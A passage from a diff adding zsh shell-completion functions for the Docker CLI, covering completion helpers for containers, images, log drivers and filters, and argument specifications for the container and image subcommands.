"$@" +} + +__docker_complete_containers_names() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_containers all names "$@" +} + +__docker_complete_info_plugins() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + emulate -L zsh + setopt extendedglob + local -a plugins + plugins=(${(ps: :)${(M)${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Plugins:}%%$'\n'^ *}}:# $1: *}## $1: }) + _describe -t plugins "$1 plugins" plugins && ret=0 + return ret +} + +__docker_complete_images() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a images + images=(${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}[2,-1]}/(#b)([^ ]##) ##([^ ]##) ##([^ ]##)*/${match[3]}:${(r:15:: :::)match[2]} in ${match[1]}}) + _describe -t docker-images "images" images && ret=0 + __docker_complete_repositories_with_tags && ret=0 + return ret +} + +__docker_complete_repositories() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a repos + repos=(${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}%% *}[2,-1]}) + repos=(${repos#}) + _describe -t docker-repos "repositories" repos && ret=0 + return ret +} + +__docker_complete_repositories_with_tags() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a repos onlyrepos matched + declare m + repos=(${${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}[2,-1]}/ ##/:::}%% *}) + repos=(${${repos%:::}#}) + # Check if we have a prefix-match for the current prefix. + onlyrepos=(${repos%::*}) + for m in $onlyrepos; do + [[ ${PREFIX##${~~m}} != ${PREFIX} ]] && { + # Yes, complete with tags + repos=(${${repos/:::/:}/:/\\:}) + _describe -t docker-repos-with-tags "repositories with tags" repos && ret=0 + return ret + } + done + # No, only complete repositories + onlyrepos=(${${repos%:::*}/:/\\:}) + _describe -t docker-repos "repositories" onlyrepos -qS : && ret=0 + + return ret +} + +__docker_search() { + [[ $PREFIX = -* ]] && return 1 + local cache_policy + zstyle -s ":completion:${curcontext}:" cache-policy cache_policy + if [[ -z "$cache_policy" ]]; then + zstyle ":completion:${curcontext}:" cache-policy __docker_caching_policy + fi + + local searchterm cachename + searchterm="${words[$CURRENT]%/}" + cachename=_docker-search-$searchterm + + local expl + local -a result + if ( [[ ${(P)+cachename} -eq 0 ]] || _cache_invalid ${cachename#_} ) \ + && ! _retrieve_cache ${cachename#_}; then + _message "Searching for ${searchterm}..." + result=(${${${(f)${:-"$(_call_program commands docker $docker_options search $searchterm)"$'\n'}}%% *}[2,-1]}) + _store_cache ${cachename#_} result + fi + _wanted dockersearch expl 'available images' compadd -a result +} + +__docker_get_log_options() { + [[ $PREFIX = -* ]] && return 1 + + integer ret=1 + local log_driver=${opt_args[--log-driver]:-"all"} + local -a awslogs_options fluentd_options gelf_options journald_options json_file_options logentries_options syslog_options splunk_options + + awslogs_options=("awslogs-region" "awslogs-group" "awslogs-stream") + fluentd_options=("env" "fluentd-address" "fluentd-async-connect" "fluentd-buffer-limit" "fluentd-retry-wait" "fluentd-max-retries" "labels" "tag") + gcplogs_options=("env" "gcp-log-cmd" "gcp-project" "labels") + gelf_options=("env" "gelf-address" "gelf-compression-level" "gelf-compression-type" "labels" "tag") + journald_options=("env" "labels" "tag") + json_file_options=("env" "labels" "max-file" "max-size") + logentries_options=("logentries-token") + syslog_options=("env" "labels" "syslog-address" "syslog-facility" "syslog-format" "syslog-tls-ca-cert" "syslog-tls-cert" "syslog-tls-key" "syslog-tls-skip-verify" "tag") + splunk_options=("env" "labels" "splunk-caname" "splunk-capath" "splunk-format" "splunk-gzip" "splunk-gzip-level" "splunk-index" "splunk-insecureskipverify" "splunk-source" "splunk-sourcetype" "splunk-token" "splunk-url" "splunk-verify-connection" "tag") + + [[ $log_driver = (awslogs|all) ]] && _describe -t awslogs-options "awslogs options" awslogs_options "$@" && ret=0 + [[ $log_driver = (fluentd|all) ]] && _describe -t fluentd-options "fluentd options" fluentd_options "$@" && ret=0 + [[ $log_driver = (gcplogs|all) ]] && _describe -t gcplogs-options "gcplogs options" gcplogs_options "$@" && ret=0 + [[ $log_driver = (gelf|all) ]] && _describe -t gelf-options "gelf options" gelf_options "$@" && ret=0 + [[ $log_driver = (journald|all) ]] && _describe -t journald-options "journald options" journald_options "$@" && ret=0 + [[ $log_driver = (json-file|all) ]] && _describe -t json-file-options "json-file options" json_file_options "$@" && ret=0 + [[ $log_driver = (logentries|all) ]] && _describe -t logentries-options "logentries options" logentries_options "$@" && ret=0 + [[ $log_driver = (syslog|all) ]] && _describe -t syslog-options "syslog options" syslog_options "$@" && ret=0 + [[ $log_driver = (splunk|all) ]] && _describe -t splunk-options "splunk options" splunk_options "$@" && ret=0 + + return ret +} + +__docker_complete_log_drivers() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + drivers=(awslogs etwlogs fluentd gcplogs gelf journald json-file none splunk syslog) + _describe -t log-drivers "log drivers" drivers && ret=0 + return ret +} + +__docker_complete_log_options() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (syslog-format) + syslog_format_opts=('rfc3164' 'rfc5424' 'rfc5424micro') + _describe -t syslog-format-opts "Syslog format Options" syslog_format_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + __docker_get_log_options -qS "=" && ret=0 + fi + + return ret +} + +__docker_complete_detach_keys() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + compset -P "*," + keys=(${:-{a-z}}) + ctrl_keys=(${:-ctrl-{{a-z},{@,'[','\\','^',']',_}}}) + _describe -t detach_keys "[a-z]" keys -qS "," && ret=0 + _describe -t detach_keys-ctrl "'ctrl-' + 'a-z @ [ \\\\ ] ^ _'" ctrl_keys -qS "," && ret=0 +} + +__docker_complete_pid() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local -a opts vopts + + opts=('host') + vopts=('container') + + if compset -P '*:'; then + case "${${words[-1]%:*}#*=}" in + (container) + __docker_complete_running_containers && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + _describe -t pid-value-opts "PID Options with value" vopts -qS ":" && ret=0 + _describe -t pid-opts "PID Options" opts && ret=0 + fi + + return ret +} + +__docker_complete_runtimes() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + emulate -L zsh + setopt extendedglob + local -a runtimes_opts + runtimes_opts=(${(ps: :)${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Runtimes: }%%$'\n'^ *}}}) + _describe -t runtimes-opts "runtimes options" runtimes_opts && ret=0 +} + +__docker_complete_ps_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (ancestor) + __docker_complete_images && ret=0 + ;; + (before|since) + __docker_complete_containers && ret=0 + ;; + (health) + health_opts=('healthy' 'none' 'starting' 'unhealthy') + _describe -t health-filter-opts "health filter options" health_opts && ret=0 + ;; + (id) + __docker_complete_containers_ids && ret=0 + ;; + (is-task) + _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0 + ;; + (name) + __docker_complete_containers_names && ret=0 + ;; + (network) + __docker_complete_networks && ret=0 + ;; + (status) + status_opts=('created' 'dead' 'exited' 'paused' 'restarting' 'running' 'removing') + _describe -t status-filter-opts "status filter options" status_opts && ret=0 + ;; + (volume) + __docker_complete_volumes && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('ancestor' 'before' 'exited' 'health' 'id' 'label' 'name' 'network' 'since' 'status' 'volume') + _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_complete_search_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a boolean_opts opts + + boolean_opts=('true' 'false') + opts=('is-automated' 'is-official' 'stars') + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (is-automated|is-official) + _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_complete_images_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a boolean_opts opts + + boolean_opts=('true' 'false') + opts=('before' 'dangling' 'label' 'reference' 'since') + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (before|reference|since) + __docker_complete_images && ret=0 + ;; + (dangling) + _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_complete_events_filter() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a opts + + opts=('container' 'daemon' 'event' 'image' 'label' 'network' 'type' 'volume') + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (container) + __docker_complete_containers && ret=0 + ;; + (daemon) + emulate -L zsh + setopt extendedglob + local -a daemon_opts + daemon_opts=( + ${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Name: }%%$'\n'^ *}} + ${${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'ID: }%%$'\n'^ *}}//:/\\:} + ) + _describe -t daemon-filter-opts "daemon filter options" daemon_opts && ret=0 + ;; + (event) + local -a event_opts + event_opts=('attach' 'commit' 'connect' 'copy' 'create' 'delete' 'destroy' 'detach' 'die' 'disconnect' 'exec_create' 'exec_detach' + 'exec_start' 'export' 'health_status' 'import' 'kill' 'load' 'mount' 'oom' 'pause' 'pull' 'push' 'reload' 'rename' 'resize' 'restart' 'save' 'start' + 'stop' 'tag' 'top' 'unmount' 'unpause' 'untag' 'update') + _describe -t event-filter-opts "event filter options" event_opts && ret=0 + ;; + (image) + __docker_complete_images && ret=0 + ;; + (network) + __docker_complete_networks && ret=0 + ;; + (type) + local -a type_opts + type_opts=('container' 'daemon' 'image' 'network' 'volume') + _describe -t type-filter-opts "type filter options" type_opts && ret=0 + ;; + (volume) + __docker_complete_volumes && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_complete_prune_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a opts + + opts=('until') + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + *) + _message 'value' && ret=0 + ;; + esac + else + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +# BO container + +__docker_container_commands() { + local -a _docker_container_subcommands + _docker_container_subcommands=( + "attach:Attach to a running container" + "commit:Create a new image from a container's changes" + "cp:Copy files/folders between a container and the local filesystem" + "create:Create a new container" + "diff:Inspect changes on a container's filesystem" + "exec:Run a command in a running container" + "export:Export a container's filesystem as a tar archive" + "inspect:Display detailed information on one or more containers" + "kill:Kill one or more running containers" + "logs:Fetch the logs of a container" + "ls:List containers" + "pause:Pause all processes within one or more containers" + "port:List port mappings or a specific mapping for the container" + "prune:Remove all stopped containers" + "rename:Rename a container" + "restart:Restart one or more containers" + "rm:Remove one or more containers" + "run:Run a command in a new container" + "start:Start one or more stopped containers" + "stats:Display a live stream of container(s) resource usage statistics" + "stop:Stop one or more running containers" + "top:Display the running processes of a container" + "unpause:Unpause all processes within one or more containers" + "update:Update configuration of one or more containers" + "wait:Block until one or more containers stop, then print their exit codes" + ) + _describe -t docker-container-commands "docker container command" _docker_container_subcommands +} + +__docker_container_subcommand() { + local -a _command_args opts_help opts_attach_exec_run_start opts_create_run opts_create_run_update + local expl help="--help" + integer ret=1 + + opts_attach_exec_run_start=( + "($help)--detach-keys=[Escape key sequence used to detach a container]:sequence:__docker_complete_detach_keys" + ) + opts_create_run=( + "($help -a --attach)"{-a=,--attach=}"[Attach to stdin, stdout or stderr]:device:(STDIN STDOUT STDERR)" + "($help)*--add-host=[Add a custom host-to-IP mapping]:host\:ip mapping: " + "($help)*--blkio-weight-device=[Block IO (relative device weight)]:device:Block IO weight: " + "($help)*--cap-add=[Add Linux capabilities]:capability: " + "($help)*--cap-drop=[Drop Linux capabilities]:capability: " + "($help)--cgroup-parent=[Parent cgroup for the container]:cgroup: " + "($help)--cidfile=[Write the container ID to the file]:CID file:_files" + "($help)--cpus=[Number of CPUs (default 0.000)]:cpus: " + "($help)*--device=[Add a host device to the container]:device:_files" + "($help)*--device-read-bps=[Limit the read rate (bytes per second) from a device]:device:IO rate: " + "($help)*--device-read-iops=[Limit the read rate (IO per second) from a device]:device:IO rate: " + "($help)*--device-write-bps=[Limit the write rate (bytes per second) to a device]:device:IO rate: " + "($help)*--device-write-iops=[Limit the write rate (IO per second) to a device]:device:IO rate: " + "($help)--disable-content-trust[Skip image verification]" + "($help)*--dns=[Custom DNS servers]:DNS server: " + "($help)*--dns-option=[Custom DNS options]:DNS option: " + "($help)*--dns-search=[Custom DNS search domains]:DNS domains: " + "($help)*"{-e=,--env=}"[Environment variables]:environment variable: " + "($help)--entrypoint=[Overwrite the default entrypoint of the image]:entry point: " + "($help)*--env-file=[Read environment variables from a file]:environment file:_files" + "($help)*--expose=[Expose a port from the container without publishing it]: " + "($help)*--group=[Set one or more supplementary user groups for the container]:group:_groups" + "($help -h --hostname)"{-h=,--hostname=}"[Container host name]:hostname:_hosts" + "($help -i --interactive)"{-i,--interactive}"[Keep stdin open even if not attached]" + "($help)--init[Run an init inside the container that forwards signals and reaps processes]" + "($help)--ip=[Container IPv4 address]:IPv4: " + "($help)--ip6=[Container IPv6 address]:IPv6: " + "($help)--ipc=[IPC namespace to use]:IPC namespace: " + "($help)--isolation=[Container isolation technology]:isolation:(default hyperv process)" + "($help)*--link=[Add link to another container]:link:->link" + "($help)*--link-local-ip=[Add a link-local address for the container]:IPv4/IPv6: " + "($help)*"{-l=,--label=}"[Container metadata]:label: " + "($help)--log-driver=[Default driver for container logs]:logging driver:__docker_complete_log_drivers" + "($help)*--log-opt=[Log driver specific options]:log driver options:__docker_complete_log_options" + "($help)--mac-address=[Container MAC address]:MAC address: " + "($help)--name=[Container name]:name: " + "($help)--network=[Connect a container to a network]:network mode:(bridge none container host)" + "($help)*--network-alias=[Add network-scoped alias for the container]:alias: " + "($help)--oom-kill-disable[Disable OOM Killer]" + "($help)--oom-score-adj[Tune the host's OOM preferences for containers (accepts -1000 to 1000)]" + "($help)--pids-limit[Tune container pids limit (set -1 for unlimited)]" + "($help -P --publish-all)"{-P,--publish-all}"[Publish all exposed ports]" + "($help)*"{-p=,--publish=}"[Expose a container's port to the host]:port:_ports" + "($help)--pid=[PID namespace to use]:PID namespace:__docker_complete_pid" + "($help)--privileged[Give extended privileges to this container]" + "($help)--read-only[Mount the container's root filesystem as read only]" + "($help)*--security-opt=[Security options]:security option: " + "($help)*--shm-size=[Size of '/dev/shm' (format is '')]:shm size: " + "($help)--stop-timeout=[Timeout (in seconds) to stop a container]:time: " + "($help)*--sysctl=-[sysctl options]:sysctl: " + "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-tty]" + "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users" + "($help)*--ulimit=[ulimit options]:ulimit: " + "($help)--userns=[Container user namespace]:user namespace:(host)" + "($help)--tmpfs[mount tmpfs]" + "($help)*-v[Bind mount a volume]:volume: " + "($help)--volume-driver=[Optional volume driver for the container]:volume driver:(local)" + "($help)*--volumes-from=[Mount volumes from the specified container]:volume: " + "($help -w --workdir)"{-w=,--workdir=}"[Working directory inside the container]:directory:_directories" + ) + opts_create_run_update=( + "($help)--blkio-weight=[Block IO (relative weight), between 10 and 1000]:Block IO weight:(10 100 500 1000)" + "($help -c --cpu-shares)"{-c=,--cpu-shares=}"[CPU shares (relative weight)]:CPU shares:(0 10 100 200 500 800 1000)" + "($help)--cpu-period=[Limit the CPU CFS (Completely Fair Scheduler) period]:CPU period: " + "($help)--cpu-quota=[Limit the CPU CFS (Completely Fair Scheduler) quota]:CPU quota: " + "($help)--cpu-rt-period=[Limit the CPU real-time period]:CPU real-time period in microseconds: " + "($help)--cpu-rt-runtime=[Limit the CPU real-time runtime]:CPU real-time runtime in microseconds: " + "($help)--cpuset-cpus=[CPUs in which to allow execution]:CPUs: " + "($help)--cpuset-mems=[MEMs in which to allow execution]:MEMs: " + "($help)--kernel-memory=[Kernel memory limit in bytes]:Memory limit: " + "($help -m --memory)"{-m=,--memory=}"[Memory limit]:Memory limit: " + "($help)--memory-reservation=[Memory soft limit]:Memory limit: " + "($help)--memory-swap=[Total memory limit with swap]:Memory limit: " + "($help)--restart=[Restart policy]:restart policy:(no on-failure always unless-stopped)" + ) + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (attach) + _arguments $(__docker_arguments) \ + $opts_help \ + $opts_attach_exec_run_start \ + "($help)--no-stdin[Do not attach stdin]" \ + "($help)--sig-proxy[Proxy all received signals to the process (non-TTY mode only)]" \ + "($help -):containers:__docker_complete_running_containers" && ret=0 + ;; + (commit) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --author)"{-a=,--author=}"[Author]:author: " \ + "($help)*"{-c=,--change=}"[Apply Dockerfile instruction to the created image]:Dockerfile:_files" \ + "($help -m --message)"{-m=,--message=}"[Commit message]:message: " \ + "($help -p --pause)"{-p,--pause}"[Pause container during commit]" \ + "($help -):container:__docker_complete_containers" \ + "($help -): :__docker_complete_repositories_with_tags" && ret=0 + ;; + (cp) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -L --follow-link)"{-L,--follow-link}"[Always follow symbol link]" \ + "($help -)1:container:->container" \ + "($help -)2:hostpath:_files" && ret=0 + case $state in + (container) + if compset -P "*:"; then + _files && ret=0 + else + __docker_complete_containers -qS ":" && ret=0 + fi + ;; + esac + ;; + (create) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + $opts_create_run \ + $opts_create_run_update \ + "($help -): :__docker_complete_images" \ + "($help -):command: _command_names -e" \ + "($help -)*::arguments: _normal" && ret=0 + case $state in + (link) + if compset -P "*:"; then + _wanted alias expl "Alias" compadd -E "" && ret=0 + else + __docker_complete_running_containers -qS ":" && ret=0 + fi + ;; + esac + ;; + (diff) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:containers:__docker_complete_containers" && ret=0 + ;; + (exec) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + $opts_attach_exec_run_start \ + "($help -d --detach)"{-d,--detach}"[Detached mode: leave the container running in the background]" \ + "($help)*"{-e=,--env=}"[Set environment variables]:environment variable: " \ + "($help -i --interactive)"{-i,--interactive}"[Keep stdin open even if not attached]" \ + "($help)--privileged[Give extended Linux capabilities to the command]" \ + "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-tty]" \ + "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users" \ + "($help -):containers:__docker_complete_running_containers" \ + "($help -)*::command:->anycommand" && ret=0 + case $state in + (anycommand) + shift 1 words + (( CURRENT-- )) + _normal && ret=0 + ;; + esac + ;; + (export) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -o --output)"{-o=,--output=}"[Write to a file, instead of stdout]:output file:_files" \ + "($help -)*:containers:__docker_complete_containers" && ret=0 + ;; + (inspect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ + "($help -s --size)"{-s,--size}"[Display total file sizes]" \ + "($help -)*:containers:__docker_complete_containers" && ret=0 + ;; + (kill) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -s --signal)"{-s=,--signal=}"[Signal to send]:signal:_signals" \ + "($help -)*:containers:__docker_complete_running_containers" && ret=0 + ;; + (logs) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)--details[Show extra details provided to logs]" \ + "($help -f --follow)"{-f,--follow}"[Follow log output]" \ + "($help -s --since)"{-s=,--since=}"[Show logs since this timestamp]:timestamp: " \ + "($help -t --timestamps)"{-t,--timestamps}"[Show timestamps]" \ + "($help)--tail=[Output the last K lines]:lines:(1 10 20 50 all)" \ + "($help -)*:containers:__docker_complete_containers" && ret=0 + ;; + (ls|list) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --all)"{-a,--all}"[Show all containers]" \ + "($help)--before=[Show only container created before...]:containers:__docker_complete_containers" \ + "($help)*"{-f=,--filter=}"[Filter values]:filter:__docker_complete_ps_filters" \ + "($help)--format=[Pretty-print containers using a Go template]:template: " \ + "($help -l --latest)"{-l,--latest}"[Show only the latest created container]" \ + "($help -n --last)"{-n=,--last=}"[Show n last created containers (includes all states)]:n:(1 5 10 25 50)" \ + "($help)--no-trunc[Do not truncate output]" \ + "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \ + "($help -s --size)"{-s,--size}"[Display total file sizes]" \ + "($help)--since=[Show only containers created since...]:containers:__docker_complete_containers" && ret=0 + ;; + (pause|unpause) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:containers:__docker_complete_running_containers" && ret=0 + ;; + (port) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)1:containers:__docker_complete_running_containers" \ + "($help -)2:port:_ports" && ret=0 + ;; + (prune) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ + "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 + ;; + (rename) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -):old name:__docker_complete_containers" \ + "($help -):new name: " && ret=0 + ;; + (restart) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -t --time)"{-t=,--time=}"[Number of seconds to try to stop for before killing the container]:seconds to before killing:(1 5 10 30 60)" \ + "($help -)*:containers:__docker_complete_containers_ids" && ret=0 + ;; + (rm) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --force)"{-f,--force}"[Force removal]" \ + "($help -l --link)"{-l,--link}"[Remove the specified link and not the underlying container]" \ + "($help -v --volumes)"{-v,--volumes}"[Remove the volumes associated to the container]" \ + "($help -)*:containers:->values" && ret=0 + case $state in + (values) + if [[ ${words[(r)-f]} == -f || ${words[(r)--force]} == --force ]]; then + __docker_complete_containers && ret=0 + else + __docker_complete_stopped_containers && ret=0 + fi + ;; + esac + ;; + (run) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + $opts_create_run \ + $opts_create_run_update \ + $opts_attach_exec_run_start \ + "($help -d --detach)"{-d,--detach}"[Detached mode: leave the container running in the background]" \ + "($help)--health-cmd=[Command to run to check health]:command: " \ + "($help)--health-interval=[Time between running the check]:time: " \ + "($help)--health-retries=[Consecutive failures needed to report unhealthy]:retries:(1 2 3 4 5)" \ + "($help)--health-timeout=[Maximum time to allow one check to run]:time: " \ + "($help)--no-healthcheck[Disable any container-specified HEALTHCHECK]" \ + "($help)--rm[Remove intermediate containers when it exits]" \ + "($help)--runtime=[Name of the runtime to be used for that container]:runtime:__docker_complete_runtimes" \ + "($help)--sig-proxy[Proxy all received signals to the process (non-TTY mode only)]" \ + "($help)--stop-signal=[Signal to kill a container]:signal:_signals" \ + "($help)--storage-opt=[Storage driver options for the container]:storage options:->storage-opt" \ + "($help -): :__docker_complete_images" \ + "($help -):command: _command_names -e" \ + "($help -)*::arguments: _normal" && ret=0 + case $state in + (link) + if compset -P "*:"; then + _wanted alias expl "Alias" compadd -E "" && ret=0 + else + __docker_complete_running_containers -qS ":" && ret=0 + fi + ;; + (storage-opt) + if compset -P "*="; then + _message "value" && ret=0 + else + opts=('size') + _describe -t filter-opts "storage options" opts -qS "=" && ret=0 + fi + ;; + esac + ;; + (start) + _arguments $(__docker_arguments) \ + $opts_help \ + $opts_attach_exec_run_start \ + "($help -a --attach)"{-a,--attach}"[Attach container's stdout/stderr and forward all signals]" \ + "($help -i --interactive)"{-i,--interactive}"[Attach container's stding]" \ + "($help -)*:containers:__docker_complete_stopped_containers" && ret=0 + ;; + (stats) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --all)"{-a,--all}"[Show all containers (default shows just running)]" \ + "($help)--format=[Pretty-print images using a Go template]:template: " \ + "($help)--no-stream[Disable streaming stats and only pull the first result]" \ + "($help -)*:containers:__docker_complete_running_containers" && ret=0 + ;; + (stop) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -t --time)"{-t=,--time=}"[Number of seconds to try to stop for before killing the container]:seconds to before killing:(1 5 10 30 60)" \ + "($help -)*:containers:__docker_complete_running_containers" && ret=0 + ;; + (top) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)1:containers:__docker_complete_running_containers" \ + "($help -)*:: :->ps-arguments" && ret=0 + case $state in + (ps-arguments) + _ps && ret=0 + ;; + esac + ;; + (update) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + opts_create_run_update \ + "($help -)*: :->values" && ret=0 + case $state in + (values) + if [[ ${words[(r)--kernel-memory*]} = (--kernel-memory*) ]]; then + __docker_complete_stopped_containers && ret=0 + else + __docker_complete_containers && ret=0 + fi + ;; + esac + ;; + (wait) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:containers:__docker_complete_running_containers" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_container_commands" && ret=0 + ;; + esac + + return ret +} + +# EO container + +# BO image + +__docker_image_commands() { + local -a _docker_image_subcommands + _docker_image_subcommands=( + "build:Build an image from a Dockerfile" + "history:Show the history of an image" + "import:Import the contents from a tarball to create a filesystem image" + "inspect:Display detailed information on one or more images" + "load:Load an image from a tar archive or STDIN" + "ls:List images" + "prune:Remove unused images" + "pull:Pull an image or a repository from a registry" + "push:Push an image or a repository to a registry" + "rm:Remove one or more images" + "save:Save one or more images to a tar archive (streamed to STDOUT by default)" + "tag:Tag an image into a repository" + ) + _describe -t docker-image-commands "docker image command" _docker_image_subcommands +} + +__docker_image_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (build) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*--build-arg=[Build-time variables]:=: " \ + "($help)*--cache-from=[Images to consider as cache sources]: :__docker_complete_repositories_with_tags" \ + "($help -c --cpu-shares)"{-c=,--cpu-shares=}"[CPU shares (relative weight)]:CPU shares:(0 10 100 200 500 800 1000)" \ + "($help)--cgroup-parent=[Parent cgroup for the container]:cgroup: " \ + "($help)--compress[Compress the build context using gzip]" \ + "($help)--cpu-period=[Limit the CPU CFS (Completely Fair Scheduler) period]:CPU period: " \ + "($help)--cpu-quota=[Limit the CPU CFS (Completely Fair Scheduler) quota]:CPU quota: " \ + "($help)--cpu-rt-period=[Limit the CPU real-time period]:CPU real-time period in microseconds: " \ + "($help)--cpu-rt-runtime=[Limit the CPU real-time runtime]:CPU real-time runtime in microseconds: " \ + "($help)--cpuset-cpus=[CPUs in which to allow execution]:CPUs: " \ + "($help)--cpuset-mems=[MEMs in which to allow execution]:MEMs: " \ + "($help)--disable-content-trust[Skip image verification]" \ + "($help -f --file)"{-f=,--file=}"[Name of the Dockerfile]:Dockerfile:_files" \ + "($help)--force-rm[Always remove intermediate containers]" \ + "($help)--isolation=[Container isolation technology]:isolation:(default hyperv process)" \ + "($help)*--label=[Set metadata for an image]:label=value: " \ + "($help -m --memory)"{-m=,--memory=}"[Memory limit]:Memory limit: " \ + "($help)--memory-swap=[Total memory limit with swap]:Memory limit: " \ + "($help)--network=[Connect a container to a network]:network mode:(bridge none container host)" \ + "($help)--no-cache[Do not use cache when building the image]" \ + "($help)--pull[Attempt to pull a newer version of the image]" \ + "($help -q --quiet)"{-q,--quiet}"[Suppress verbose build output]" \ + "($help)--rm[Remove intermediate containers after a successful build]" \ + "($help)*--shm-size=[Size of '/dev/shm' (format is '')]:shm size: " \ + "($help -t --tag)*"{-t=,--tag=}"[Repository, name and tag for the image]: :__docker_complete_repositories_with_tags" \ + "($help)*--ulimit=[ulimit options]:ulimit: " \ + "($help)--userns=[Container user namespace]:user namespace:(host)" \ + "($help -):path or URL:_directories" && ret=0 + ;; + (history) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -H --human)"{-H,--human}"[Print sizes and dates in human readable format]" \ + "($help)--no-trunc[Do not truncate output]" \ + "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \ + "($help -)*: :__docker_complete_images" && ret=0 + ;; + (import) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*"{-c=,--change=}"[Apply Dockerfile instruction to the created image]:Dockerfile:_files" \ + "($help -m --message)"{-m=,--message=}"[Commit message for imported image]:message: " \ + "($help -):URL:(- http:// file://)" \ + "($help -): :__docker_complete_repositories_with_tags" && ret=0 + ;; + (inspect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ + "($help -)*:images:__docker_complete_images" && ret=0 + ;; + (load) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -i --input)"{-i=,--input=}"[Read from tar archive file]:archive file:_files -g \"*.((tar|TAR)(.gz|.GZ|.Z|.bz2|.lzma|.xz|)|(tbz|tgz|txz))(-.)\"" \ + "($help -q --quiet)"{-q,--quiet}"[Suppress the load output]" && ret=0 + ;; + (ls|list) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --all)"{-a,--all}"[Show all images]" \ + "($help)--digests[Show digests]" \ + "($help)*"{-f=,--filter=}"[Filter values]:filter:->filter-options" \ + "($help)--format=[Pretty-print images using a Go template]:template: " \ + "($help)--no-trunc[Do not truncate output]" \ + "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \ + "($help -): :__docker_complete_repositories" && ret=0 + case $state in + (filter-options) + __docker_complete_images_filters && ret=0 + ;; + esac + ;; + (prune) + _arguments 